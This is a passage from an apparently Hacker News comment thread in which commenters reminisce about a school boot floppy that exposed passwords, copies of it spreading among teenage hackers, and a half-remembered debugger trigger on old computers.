_and_ discovered | all the passwords we weren 't supposed to know. I think we only | used that to play bolo (early tank proto-battle-royale). | _However_... several years later in my first year at university, | I happened to talk to someone attending the local high school. | The had a copy of my friend 's boot floppy! I know we never | bothered to upload it a BBS, but somehow it ended up in the hands | of quite a few high school hackers in multiple cities. | Communitivity wrote: | Nice. This brings back a very fuzzy memory. I think I found at | one point the 'software developer switch' a physical trigger | for the NMI, was still in the software in the form of flower G, | and would pop you into a debugger. I think.. the memory is very | fuzzy, as it's been 30+ years since high school. ___________________________________________________________________ (page generated 2021-06-30 23:01 UTC)